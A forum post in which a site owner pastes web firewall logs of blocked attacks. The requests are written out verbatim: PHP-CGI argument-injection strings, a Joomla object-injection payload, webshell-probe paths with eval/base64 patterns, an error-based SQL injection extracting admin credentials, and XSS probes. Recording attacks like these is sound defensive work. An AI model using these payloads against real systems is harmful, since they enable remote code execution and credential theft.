我被攻击了 扫描 sql注入 web应用漏洞利用
WEB扫描
iT-Xy 2020-03-16 00:19:59 534人浏览

34.95.9.172(美国halliburton.com) 访问 127.0.0.1(本机ip)/, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

218.244.142.238(中国浙江杭州) 访问 127.0.0.1(本机ip):80*, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

194.180.224.249(德国) 访问 127.0.0.1(本机ip)/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

119.28.104.104(新加坡tencent.com) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:127.0.0.1(本机ip)/nnn.php

119.28.104.104(新加坡tencent.com) 访问 127.0.0.1(本机ip)/cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

119.28.104.104(新加坡tencent.com) 访问 127.0.0.1(本机ip)/cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

119.28.104.104(新加坡tencent.com) 访问 127.0.0.1(本机ip)/cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

119.28.104.104(新加坡tencent.com) 访问 127.0.0.1(本机ip)/cgi-bin/php5?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

119.28.104.104(新加坡tencent.com) 访问 127.0.0.1(本机ip)/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

209.97.190.223(美国) 疑似扫描器行为,已被拦截(60分钟后解封)。

91.121.157.178(法国北部-加来海峡大区鲁贝) 疑似扫描器行为,已被拦截(60分钟后解封)。

167.99.40.21(美国) 疑似扫描器行为,已被拦截(60分钟后解封)。

195.154.211.33(法国法兰西岛大区塞纳河畔维提) 疑似扫描器行为,已被拦截(60分钟后解封)。

54.36.49.151(美国merck.com) 疑似扫描器行为,已被拦截(60分钟后解封)。

5.196.65.85(法国北部-加来海峡大区鲁贝) 疑似扫描器行为,已被拦截(60分钟后解封)。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/Joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/cgi-bin/php4?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/cgi-bin/php-cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

122.51.189.39(中国广东汕尾hzgit.com) 访问 127.0.0.1(本机ip)/cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n, 触发规则:305::禁止使用php://input, 可疑行为:php://input,已被拦截。

51.38.57.199(英国gov.uk) 疑似扫描器行为,已被拦截(60分钟后解封)。

94.140.114.53(拉脱维亚) 疑似扫描器行为,已被拦截(60分钟后解封)。

49.232.151.99(中国bjedu.com.cn) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:127.0.0.1(本机ip)/index.php

49.232.151.99(中国bjedu.com.cn) 访问 127.0.0.1(本机ip)/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

49.232.151.99(中国bjedu.com.cn) 访问 127.0.0.1(本机ip)/Joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

49.232.151.99(中国bjedu.com.cn) 访问 127.0.0.1(本机ip)/joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

216.245.216.22(美国德克萨斯州达拉斯) 疑似扫描器行为,已被拦截(60分钟后解封)。

202.168.64.24(马来西亚) 疑似扫描器行为,已被拦截(60分钟后解封)。

185.53.88.15(荷兰) 疑似扫描器行为,已被拦截(60分钟后解封)。

34.222.113.84(美国俄勒冈州波特兰) 访问 127.0.0.1(本机ip)/, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

5.189.176.208(德国巴伐利亚州慕尼黑) 疑似扫描器行为,已被拦截(60分钟后解封)。

173.212.218.126(德国) 疑似扫描器行为,已被拦截(60分钟后解封)。

197.45.145.165(埃及) 访问 127.0.0.1(本机ip)/ipc$, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

112.252.27.233(中国山东滨州) 访问 二号域名/include/taglib/201907.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

112.252.27.233(中国山东滨州) 访问 二号域名/include/taglib/2018gf.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

112.252.27.233(中国山东滨州) 访问 二号域名/include/taglib/716.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

112.252.27.233(中国山东滨州) 访问 二号域名/include/taglib/cheng.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

112.252.27.233(中国山东滨州) 访问 二号域名/plus/mytag_js.php?aid=511348, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

112.252.27.233(中国山东滨州) 访问 二号域名/include/taglib/ty.lib.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

34.89.11.172(美国halliburton.com) 访问 127.0.0.1(本机ip)/, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

180.176.170.15(中国台湾彰化县) 访问 127.0.0.1(本机ip)/ipc$, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

202.146.217.192(中国香港) 访问 127.0.0.1(本机ip)/Joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

202.146.217.192(中国香港) 访问 127.0.0.1(本机ip)/joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

202.146.217.192(中国香港) 访问 127.0.0.1(本机ip)/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

103.55.30.232(中国香港) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:一号域名/JH_Admin/msgbook/fushi.asp

103.55.30.232(中国香港) 访问 一号域名/guestbook/images/lu.PhP, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/uploads/120305/shantao.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/skin/js/bozhao.PHP, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/includes/inc.constants.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/templets/default/css/xintuyong.PHP, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/data/dede.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/mytag_js.php?aid=511348, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/install/da.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/utility/convert/data/config.inc.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/ad_js.php?aid=8888, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/read.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/moon.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/result.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/mytag_js.php?aid=8080, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/wp-content/themes/shop-isle/404.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/wp-content/themes/twentyfourteen/footer.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/forumconfig/config_ucenter.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/libraries/sfn.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/wp-content/plugins/login-wall-plixclogin_wall.php?login=cmd, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/wp-content/plugins/login-wall-lurbn/login_wall.php?login=cmd, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/themes/custom_themes/index.php/?fukq=t, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/mytag_js.php?aid=9527, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/plus/mytag_js.php?aid=9090, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

103.55.30.232(中国香港) 访问 一号域名/data/cache/asd.php, 触发规则:302::一句话木马利用工具防护一(PHP), 可疑行为:eval (base64_decode($_POST,已被拦截。

136.228.163.98(美国) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:127.0.0.1(本机ip)/rrr.php

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/Joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/Joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

121.127.228.249(中国香港) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:127.0.0.1(本机ip)/rrr.php

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/Joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/joomla/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

129.226.74.125(新西兰unisys.com) 访问 127.0.0.1(本机ip)/, 触发规则:HTTP请求防护, 可疑行为:}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:56:"die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}瘕,已被拦截。

111.206.59.134(中国北京) 访问 /, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

61.180.52.48(中国江西新余) 访问 www.二号域名/news/html/?0'union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from pwn_base_admin limit 0,1),0x3a)a from information_schema.tables group by a)b where'1'='1.html, 触发规则:109::对数据库进行数据查询操作防护, 可疑行为:select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from pwn_base_admin limit 0,1),0x3a)a from information_schema.tables group by a)b where'1'='1.html,已被拦截。

61.180.52.48(中国江西新余) 访问 www.二号域名/news/html/?0'union select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from pwn_base_admin limit 0,1),0x3a)a from information_schema.tables group by a)b where'1'='1.html, 触发规则:109::对数据库进行数据查询操作防护, 可疑行为:select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(user,0x3a,password) from pwn_base_admin limit 0,1),0x3a)a from information_schema.tables group by a)b where'1'='1.html,已被拦截。

83.97.20.34(波兰) 访问 /, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

83.97.20.34(波兰) 访问 /, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

35.205.18.79(美国密歇根州umich.edu) 访问 127.0.0.1(本机ip)/, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

83.97.20.34(波兰) 访问 /, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

18.144.154.177(美国马萨诸塞州剑桥mit.edu) 访问 127.0.0.1(本机ip)/, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

182.47.144.153(中国山东枣庄) 访问 一号域名/index.php?admin-config-update.html, 触发规则:214::A标签内JS类型的XSS防护, 可疑行为:<a href="javascript:,已被拦截。

182.47.144.153(中国山东枣庄) 访问 一号域名/index.php?admin-config-update.html, 触发规则:214::A标签内JS类型的XSS防护, 可疑行为:<a href="javascript:,已被拦截。

182.47.144.153(中国山东枣庄) 访问 一号域名/index.php?admin-config-update.html, 触发规则:214::A标签内JS类型的XSS防护, 可疑行为:<a href="javascript:,已被拦截。

45.125.116.70(印度) 访问 127.0.0.1(本机ip)/ipc$, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

36.226.91.184(中国台湾桃园市) 访问 127.0.0.1(本机ip)/ipc$, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

129.28.151.40(美国) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:127.0.0.1(本机ip)/tyrant.php

124.43.16.144(斯里兰卡) 的访问已被拦截,拦截原因:此IP访问过于频繁,已被列入黑名单(20分钟后解封)。被攻击URL:127.0.0.1(本机ip)/7.php

36.37.131.13(柬埔寨) 访问 127.0.0.1(本机ip)/ipc$, 触发规则:禁止不常见的HTTP请求。(OPTIONS),已被拦截。

匿名用户 2020-03-18 15:41:24 回复
这么多